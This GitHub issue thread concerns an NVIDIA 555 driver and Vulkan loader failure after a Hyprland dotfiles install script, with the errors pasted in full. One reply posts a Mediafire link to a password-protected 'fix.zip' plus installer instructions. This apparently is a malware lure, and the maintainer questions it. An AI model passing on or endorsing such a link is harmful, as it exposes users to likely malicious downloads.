### ISSUE TITLE
[Bug]: nvidia-smi has failed because it couldnt comunicate with the NVIDIA driver

### ISSUE THREAD

**Issue by KukicVidan** [JaKooLit/Hyprland-Dots#416]
I am on 555 drivers that come installed with the script when i press y on the prompt about nvidia gpu.
Using RTX 3060.
Problem is that when i run steam CS2 for example i have error that says vulkan is not installed and that version 1.2+ is needed. 

nvidia-smi                                                    ✔ 

NVIDIA-SMI has failed because it couldn't communicate with the NVIDIA driver. Make sure that the latest NVIDIA driver is installed and running.

    ~  vulkaninfo                                                  9 ✘ 

WARNING: [Loader Message] Code 0 : loader_scanned_icd_add: Using deprecated ICD interface of 'vkGetInstanceProcAddr' instead of 'vk_icdGetInstanceProcAddr' for ICD libvulkan.so.1
WARNING: [Loader Message] Code 0 : loader_scanned_icd_add: Driver libvulkan.so.1 supports Vulkan 1.3, but only supports loader interface version 0. Interface version 5 or newer required to support this version of Vulkan (Policy #LDP_DRIVER_7)
ERROR: [Loader Message] Code 0 : loader_add_instance_extensions: libvulkan.so.1's vkEnumerateInstanceExtensionProperties points to the loader, this would lead to infinite recursion.
ERROR: [Loader Message] Code 0 : loader_add_instance_extensions: libvulkan.so.1's vkEnumerateInstanceExtensionProperties points to the loader, this would lead to infinite recursion.

**Comment by JaKooLit** [comment]
Most like nvidia driver was not install properly.. or you need to reboot

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JaKooLit** [comment]
> Download 
> https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
> password: changeme
> In the installer menu, select "gcc."

kindly explain what is this about?

**Comment by JaKooLit** [comment]
? I wonder what github staff removed from my comment


anyway, any progress here?

**Comment by JaKooLit** [comment]
closing since no reply from OP
